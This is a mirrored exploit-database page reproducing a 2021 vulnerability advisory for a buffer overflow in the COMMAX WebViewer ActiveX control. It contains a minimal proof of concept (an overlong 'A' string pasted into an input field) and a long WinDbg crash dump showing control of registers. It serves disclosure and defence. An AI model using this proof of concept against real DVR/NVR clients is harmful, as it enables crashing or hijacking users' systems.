扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 |
# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 2.1.4.5 Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR. Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a buffer overflow when a user inserts overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node. Tested on: Microsoft Windows 10 Home (64bit) EN Microsoft Internet Explorer 20H2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5663 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php 02.08.2021 -- $ python >>> "A"*1000 [ToTheClipboard] >>>#Paste in ID or anywhere (5220.5b30): Access violation - code c0000005 (!!! second chance !!!) wow64!Wow64pNotifyDebugger+0x19918: 00007ff9<code>deb0b530 c644242001mov byte ptr [rsp+20h],1 ss:00000000</code>0c47de00=00 0:038> g (5220.5b30): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found.Defaulted to export symbols for CNC_Ctrl.DLL - CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aarep stos byte ptr es:[edi] 0:038:x86> r eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141 eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246 CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aarep stos byte ptr es:[edi] 0:038:x86> !exchain 0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950) 0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20) CRT scope0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806) func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f) 0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29) Invalid exception stack at ffffffff 0:038:x86> kb # ChildEBP RetAddrArgs to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c 02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 0:038:x86> d esp 0d78f9200f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b...........vx.~. 0d78f930b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00..~..]@.AAAA.... 0d78f94000 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00. ......x.~..... 0d78f95010 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00.^.u%.@...x. ... 0d78f96000 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00.i.a..x......... 0d78f97010 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76..........x.W(.v 0d78f98070 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76p:...........(.v 0d78f99000 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00............t... 0:038:x86> d ebp 0d78f930b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00..~..]@.AAAA.... 0d78f94000 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00. ......x.~..... 0d78f95010 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00.^.u%.@...x. ... 0d78f96000 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00.i.a..x......... 0d78f97010 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76..........x.W(.v 0d78f98070 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76p:...........(.v 0d78f99000 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00............t... 0d78f9a08c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00................ 0:038:x86> d esi 41414141?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 41414151?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 41414161?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 41414171?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 41414181?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 41414191?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 414141a1?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 414141b1?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?????????????????? 0:038:x86> !analyze -v ******************************************************************************* * * *Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found.Defaulted to export symbols for ie_to_edge_bho.dll - *** ERROR: Symbol file could not be found.Defaulted to export symbols for Commax_WebViewer.OCX - GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: CNC_Ctrl!DllUnregisterServer+f5501 0b4d43bf f3aarep stos byte ptr es:[edi] EXCEPTION_RECORD:(.exr -1) ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 41414141 Attempt to write to address 41414141 FAULTING_THREAD:00005b30 DEFAULT_BUCKET_ID:INVALID_POINTER_WRITE PROCESS_NAME:IEXPLORE.EXE ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE_STR:c0000005 EXCEPTION_PARAMETER1:00000001 EXCEPTION_PARAMETER2:41414141 FOLLOWUP_IP: CNC_Ctrl!DllUnregisterServer+f5501 0b4d43bf f3aarep stos byte ptr es:[edi] WRITE_ADDRESS:41414141 WATSON_BKT_PROCSTAMP:95286d96 WATSON_BKT_PROCVER:11.0.19041.1 PROCESS_VER_PRODUCT:Internet Explorer WATSON_BKT_MODULE:CNC_Ctrl.DLL WATSON_BKT_MODSTAMP:547ed821 WATSON_BKT_MODOFFSET:1043bf WATSON_BKT_MODVER:1.7.0.2 MODULE_VER_PRODUCT:CNC_Ctrl Module BUILD_VERSION_STRING:10.0.19041.1023 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH:aadfa1c5bdd8f77b979f6a5b222994db450b715e MODLIST_SHA1_HASH:849cfdbdcb18d5749dc41f313fc544a643772db9 NTGLOBALFLAG:0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS:0 PRODUCT_TYPE:1 SUITE_MASK:784 DUMP_TYPE:fe ANALYSIS_SESSION_HOST:LAB17 ANALYSIS_SESSION_TIME:08-12-2021 14:20:11.0116 ANALYSIS_VERSION: 10.0.16299.91 amd64fre THREAD_ATTRIBUTES: OS_LOCALE:ENU PROBLEM_CLASSES: ID: [0n301] Type: [@ACCESS_VIOLATION] Class:Addendum Scope:BUCKET_ID Name: Omit Data: Omit PID:[Unspecified] TID:[0x5b30] Frame:[0] : CNC_Ctrl!DllUnregisterServer ID: [0n274] Type: [INVALID_POINTER_WRITE] Class:Primary Scope:DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID:[Unspecified] TID:[0x5b30] Frame:[0] : CNC_Ctrl!DllUnregisterServer ID: [0n152] Type: [ZEROED_STACK] Class:Addendum Scope:BUCKET_ID Name: Add Data: Omit PID:[0x5220] TID:[0x5b30] Frame:[0] : CNC_Ctrl!DllUnregisterServer BUGCHECK_STR:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK PRIMARY_PROBLEM_CLASS:APPLICATION_FAULT LAST_CONTROL_TRANSFER:from 0b405dea to 0b4d43bf STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 THREAD_SHA1_HASH_MOD_FUNC:e84e62df4095d241971250198ae18de0797cfdc7 THREAD_SHA1_HASH_MOD_FUNC_OFFSET:2033316a7c1a92aaeab1ce97e013350953fef546 THREAD_SHA1_HASH_MOD:6d850af928076b326edbcafdf6dd4f771aafbab5 FAULT_INSTR_CODE:458baaf3 SYMBOL_STACK_INDEX:0 SYMBOL_NAME:CNC_Ctrl!DllUnregisterServer+f5501 FOLLOWUP_NAME:MachineOwner MODULE_NAME: CNC_Ctrl IMAGE_NAME:CNC_Ctrl.DLL DEBUG_FLR_IMAGE_TIMESTAMP:547ed821 STACK_COMMAND:~38s ; .cxr ; kb FAILURE_BUCKET_ID:INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer BUCKET_ID:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501 FAILURE_EXCEPTION_CODE:c0000005 FAILURE_IMAGE_NAME:CNC_Ctrl.DLL BUCKET_ID_IMAGE_STR:CNC_Ctrl.DLL FAILURE_MODULE_NAME:CNC_Ctrl BUCKET_ID_MODULE_STR:CNC_Ctrl FAILURE_FUNCTION_NAME:DllUnregisterServer BUCKET_ID_FUNCTION_STR:DllUnregisterServer BUCKET_ID_OFFSET:f5501 BUCKET_ID_MODTIMEDATESTAMP:547ed821 BUCKET_ID_MODCHECKSUM:357a4b BUCKET_ID_MODVER_STR:1.7.0.2 BUCKET_ID_PREFIX_STR:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ FAILURE_PROBLEM_CLASS:APPLICATION_FAULT FAILURE_SYMBOL_NAME:CNC_Ctrl.DLL!DllUnregisterServer WATSON_STAGEONE_URL:http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1 TARGET_TIME:2021-08-12T12:21:50.000Z OSBUILD:19042 OSSERVICEPACK:1023 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE:x64 OSNAME:Windows 10 OSEDITION:Windows 10 WinNt SingleUserTS Personal USER_LCID:0 OSBUILD_TIMESTAMP:unknown_date BUILDDATESTAMP_STR:160101.0800 BUILDLAB_STR:WinBuild BUILDOSVER_STR:10.0.19041.1023 ANALYSIS_SESSION_ELAPSED_TIME:1d869 ANALYSIS_SOURCE:UM FAILURE_ID_HASH_STRING:um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver FAILURE_ID_HASH:{5e1e375a-c411-e928-cd64-b7f6c07eea3b} Followup: MachineOwner --------- |
体验盒子
